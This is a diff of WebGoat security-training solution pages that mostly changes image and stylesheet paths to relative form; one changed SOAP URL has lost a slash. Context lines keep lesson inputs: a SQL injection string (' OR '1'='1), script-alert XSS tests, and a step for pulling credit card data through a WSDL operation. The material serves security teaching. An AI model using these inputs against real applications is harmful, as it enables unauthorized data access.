visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/SoapRequest_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/SoapRequest_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/SoapRequest_files/image008.jpg" v:shapes="Picture_x0020_16"><![endif]></span></p>
src="lesson_solutions/SoapRequest_files/image008.jpg" v:shapes="Picture_x0020_16"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -789,7 +789,7 @@ HTTP Request with WebScarab and click on the
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'>POST
http://neo:80/WebGoat/services/SoapRequest HTTP/1.1<o:p></o:p></span></p>
http://neo:80services/SoapRequest HTTP/1.1<o:p></o:p></span></p>
<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'>Content-Type:
text/xml<o:p></o:p></span></p>
@ -843,9 +843,9 @@ is Joe.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_17"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square' filled="t" fillcolor="yellow">
<v:imagedata src="/WebGoat/lesson_solutions/SoapRequest_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/SoapRequest_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/SoapRequest_files/image010.jpg" v:shapes="Picture_x0020_17"><![endif]></span></p>
src="lesson_solutions/SoapRequest_files/image010.jpg" v:shapes="Picture_x0020_17"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/SqlNumericInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/SqlNumericInjection_files/editdata.mso">
<link rel=File-List href="lesson_solutions/SqlNumericInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/SqlNumericInjection_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,9 +36,9 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/SqlNumericInjection_files/themedata.thmx">
<link rel=themeData href="lesson_solutions/SqlNumericInjection_files/themedata.thmx">
<link rel=colorSchemeMapping
href="/WebGoat/lesson_solutions/SqlNumericInjection_files/colorschememapping.xml">
href="lesson_solutions/SqlNumericInjection_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -638,7 +638,7 @@ query: SELECT * FROM weather_data WHERE station = 101<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<img src = "/WebGoat/lesson_solutions/SqlNumericInjection_files/numericinjection.png" width=350px>
<img src = "lesson_solutions/SqlNumericInjection_files/numericinjection.png" width=350px>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
@ -654,7 +654,7 @@ field-end'></span><![endif]--> Intercepted Request with WebScarab<span style='fo
a list of all stations:<o:p></o:p></span></p>
<img src = "/WebGoat/lesson_solutions/SqlNumericInjection_files/numericinjection_solved.png" width=350px>
<img src = "lesson_solutions/SqlNumericInjection_files/numericinjection_solved.png" width=350px>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/SqlStringInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/SqlStringInjection_files/editdata.mso">
<link rel=File-List href="lesson_solutions/SqlStringInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/SqlStringInjection_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,9 +36,9 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/SqlStringInjection_files/themedata.thmx">
<link rel=themeData href="lesson_solutions/SqlStringInjection_files/themedata.thmx">
<link rel=colorSchemeMapping
href="/WebGoat/lesson_solutions/SqlStringInjection_files/colorschememapping.xml">
href="lesson_solutions/SqlStringInjection_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -653,9 +653,9 @@ terminated with single quotes to have a valid SQL Query.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_1536" o:spid="_x0000_i1026" type="#_x0000_t75"
style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/SqlStringInjection_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/SqlStringInjection_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/SqlStringInjection_files/image005.jpg" v:shapes="Picture_x0020_1536"><![endif]></span></p>
src="lesson_solutions/SqlStringInjection_files/image005.jpg" v:shapes="Picture_x0020_1536"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -679,9 +679,9 @@ last name value: Erwin' OR '1'='1 <o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1537"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/SqlStringInjection_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/SqlStringInjection_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/SqlStringInjection_files/image006.jpg" v:shapes="Picture_x0020_1537"><![endif]></span></p>
src="lesson_solutions/SqlStringInjection_files/image006.jpg" v:shapes="Picture_x0020_1537"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/StoredXSS_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/StoredXSS_files/editdata.mso">
<link rel=File-List href="lesson_solutions/StoredXSS_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/StoredXSS_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/StoredXSS_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/StoredXSS_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/StoredXSS_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/StoredXSS_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -633,9 +633,9 @@ undesirable page or content.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_1339" o:spid="_x0000_i1027" type="#_x0000_t75"
style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/StoredXSS_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/StoredXSS_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/StoredXSS_files/image007.jpg" v:shapes="Picture_x0020_1339"><![endif]></span></p>
src="lesson_solutions/StoredXSS_files/image007.jpg" v:shapes="Picture_x0020_1339"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -659,9 +659,9 @@ box.<br><br></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1340"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/StoredXSS_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/StoredXSS_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/StoredXSS_files/image008.jpg" v:shapes="Picture_x0020_1340"><![endif]></span></p>
src="lesson_solutions/StoredXSS_files/image008.jpg" v:shapes="Picture_x0020_1340"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -675,9 +675,9 @@ field-end'></span><![endif]--> Stored message<span style='font-family:"Arial","s
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1341"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:267.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/StoredXSS_files/image005.png" o:title="" cropbottom="4597f"/>
<v:imagedata src="lesson_solutions/StoredXSS_files/image005.png" o:title="" cropbottom="4597f"/>
</v:shape><![endif]--><![if !vml]><img width=640 height=357
src="/WebGoat/lesson_solutions/StoredXSS_files/image009.jpg" v:shapes="Picture_x0020_1341"><![endif]></span></p>
src="lesson_solutions/StoredXSS_files/image009.jpg" v:shapes="Picture_x0020_1341"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/ThreadSafetyProblem_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/ThreadSafetyProblem_files/editdata.mso">
<link rel=File-List href="lesson_solutions/ThreadSafetyProblem_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/ThreadSafetyProblem_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,9 +36,9 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/ThreadSafetyProblem_files/themedata.thmx">
<link rel=themeData href="lesson_solutions/ThreadSafetyProblem_files/themedata.thmx">
<link rel=colorSchemeMapping
href="/WebGoat/lesson_solutions/ThreadSafetyProblem_files/colorschememapping.xml">
href="lesson_solutions/ThreadSafetyProblem_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -571,9 +571,9 @@ font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapety
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_15" o:spid="_x0000_i1027" type="#_x0000_t75"
style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ThreadSafetyProblem_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/ThreadSafetyProblem_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/ThreadSafetyProblem_files/image002.jpg" v:shapes="Picture_x0020_15"><![endif]></span></p>
src="lesson_solutions/ThreadSafetyProblem_files/image002.jpg" v:shapes="Picture_x0020_15"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -603,10 +603,10 @@ fast on the submit button in the right window and then in the left window.<o:p><
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_16"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:262.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ThreadSafetyProblem_files/image003.png" o:title=""
<v:imagedata src="lesson_solutions/ThreadSafetyProblem_files/image003.png" o:title=""
cropbottom="5791f"/>
</v:shape><![endif]--><![if !vml]><img width=640 height=350
src="/WebGoat/lesson_solutions/ThreadSafetyProblem_files/image004.jpg" v:shapes="Picture_x0020_16"><![endif]></span><span
src="lesson_solutions/ThreadSafetyProblem_files/image004.jpg" v:shapes="Picture_x0020_16"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
@ -627,10 +627,10 @@ different user name!<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_35"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:274.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ThreadSafetyProblem_files/image007.png" o:title=""
<v:imagedata src="lesson_solutions/ThreadSafetyProblem_files/image007.png" o:title=""
cropbottom="3061f"/>
</v:shape><![endif]--><![if !vml]><img width=640 height=366
src="/WebGoat/lesson_solutions/ThreadSafetyProblem_files/image009.jpg" v:shapes="Picture_x0020_35"><![endif]></span></p>
src="lesson_solutions/ThreadSafetyProblem_files/image009.jpg" v:shapes="Picture_x0020_35"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/TraceXSS_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/TraceXSS_files/editdata.mso">
<link rel=File-List href="lesson_solutions/TraceXSS_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/TraceXSS_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/TraceXSS_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/TraceXSS_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/TraceXSS_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/TraceXSS_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -658,9 +658,9 @@ document.write(str1);}&lt;/script&gt;<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_1370" o:spid="_x0000_i1025" type="#_x0000_t75"
style='width:480pt;height:276pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/TraceXSS_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/TraceXSS_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/TraceXSS_files/image002.jpg" v:shapes="Picture_x0020_1370"><![endif]></span></p>
src="lesson_solutions/TraceXSS_files/image002.jpg" v:shapes="Picture_x0020_1370"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/UncheckedEmail_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/UncheckedEmail_files/editdata.mso">
<link rel=File-List href="lesson_solutions/UncheckedEmail_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/UncheckedEmail_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/UncheckedEmail_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/UncheckedEmail_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/UncheckedEmail_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/UncheckedEmail_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -578,9 +578,9 @@ malicious script like &lt;script&gt;alert("XSS")&lt;/script&gt; and click Send!<
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_168" o:spid="_x0000_i1028" type="#_x0000_t75"
style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/UncheckedEmail_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/UncheckedEmail_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/UncheckedEmail_files/image002.jpg" v:shapes="Picture_x0020_168"><![endif]></span></p>
src="lesson_solutions/UncheckedEmail_files/image002.jpg" v:shapes="Picture_x0020_168"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -598,9 +598,9 @@ field-end'></span><![endif]--> Lesson 5<span style='font-family:"Arial","sans-se
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_169"
o:spid="_x0000_i1027" type="#_x0000_t75" style='width:480pt;height:270pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/UncheckedEmail_files/image003.png" o:title="" cropbottom="4085f"/>
<v:imagedata src="lesson_solutions/UncheckedEmail_files/image003.png" o:title="" cropbottom="4085f"/>
</v:shape><![endif]--><![if !vml]><img width=640 height=360
src="/WebGoat/lesson_solutions/UncheckedEmail_files/image004.jpg" v:shapes="Picture_x0020_169"><![endif]></span></p>
src="lesson_solutions/UncheckedEmail_files/image004.jpg" v:shapes="Picture_x0020_169"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -622,9 +622,9 @@ to <a href="mailto:bill.gates@microsoft.com">bill.gates@microsoft.com</a><o:p></
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_170"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/UncheckedEmail_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/UncheckedEmail_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img border=0 width=640 height=369
src="/WebGoat/lesson_solutions/UncheckedEmail_files/image006.jpg" v:shapes="Picture_x0020_170"><![endif]></span><span
src="lesson_solutions/UncheckedEmail_files/image006.jpg" v:shapes="Picture_x0020_170"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
@ -642,9 +642,9 @@ address<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_171"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:273.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/UncheckedEmail_files/image007.png" o:title="" cropbottom="3231f"/>
<v:imagedata src="lesson_solutions/UncheckedEmail_files/image007.png" o:title="" cropbottom="3231f"/>
</v:shape><![endif]--><![if !vml]><img border=0 width=640 height=365
src="/WebGoat/lesson_solutions/UncheckedEmail_files/image008.jpg" v:shapes="Picture_x0020_171"><![endif]></span><span
src="lesson_solutions/UncheckedEmail_files/image008.jpg" v:shapes="Picture_x0020_171"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/WSDLScanning_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/WSDLScanning_files/editdata.mso">
<link rel=File-List href="lesson_solutions/WSDLScanning_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/WSDLScanning_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/WSDLScanning_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/WSDLScanning_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/WSDLScanning_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/WSDLScanning_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -636,9 +636,9 @@ to get some customer credit numbers.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_23" o:spid="_x0000_i1028" type="#_x0000_t75"
style='width:480pt;height:276pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WSDLScanning_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/WSDLScanning_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/WSDLScanning_files/image009.jpg" v:shapes="Picture_x0020_23"><![endif]></span></p>
src="lesson_solutions/WSDLScanning_files/image009.jpg" v:shapes="Picture_x0020_23"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -661,9 +661,9 @@ file in a new window. There is an operation getCreditCard.<o:p></o:p></span></p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_24" o:spid="_x0000_i1027"
type="#_x0000_t75" style='width:480pt;height:276pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WSDLScanning_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/WSDLScanning_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/WSDLScanning_files/image010.jpg" v:shapes="Picture_x0020_24"><![endif]></span><span
src="lesson_solutions/WSDLScanning_files/image010.jpg" v:shapes="Picture_x0020_24"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@ -677,9 +677,9 @@ request with WebScarab and change the parameter to getCreditCard<o:p></o:p></spa
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_25"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WSDLScanning_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/WSDLScanning_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/WSDLScanning_files/image011.jpg" v:shapes="Picture_x0020_25"><![endif]></span></p>
src="lesson_solutions/WSDLScanning_files/image011.jpg" v:shapes="Picture_x0020_25"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -694,9 +694,9 @@ field-end'></span><![endif]--> WebScarab raw request<span style='font-family:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_26"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WSDLScanning_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/WSDLScanning_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/WSDLScanning_files/image012.jpg" v:shapes="Picture_x0020_26"><![endif]></span></p>
src="lesson_solutions/WSDLScanning_files/image012.jpg" v:shapes="Picture_x0020_26"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC


@ -10,8 +10,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/editdata.mso">
<link rel=File-List href="lesson_solutions/WeakAuthenticationCookie_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/WeakAuthenticationCookie_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -41,9 +41,9 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/themedata.thmx">
<link rel=themeData href="lesson_solutions/WeakAuthenticationCookie_files/themedata.thmx">
<link rel=colorSchemeMapping
href="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/colorschememapping.xml">
href="lesson_solutions/WeakAuthenticationCookie_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -674,9 +674,9 @@ will always inject your old cookie and not the new cookie.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_596" o:spid="_x0000_i1033" type="#_x0000_t75"
style='width:465pt;height:267.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakAuthenticationCookie_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=620 height=357
src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image019.jpg" v:shapes="Picture_x0020_596"><![endif]></span></p>
src="lesson_solutions/WeakAuthenticationCookie_files/image019.jpg" v:shapes="Picture_x0020_596"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -691,9 +691,9 @@ requests&quot;<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span><
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_597"
o:spid="_x0000_i1032" type="#_x0000_t75" style='width:473.25pt;height:273pt;
visibility:visible;mso-wrap-style:square'>
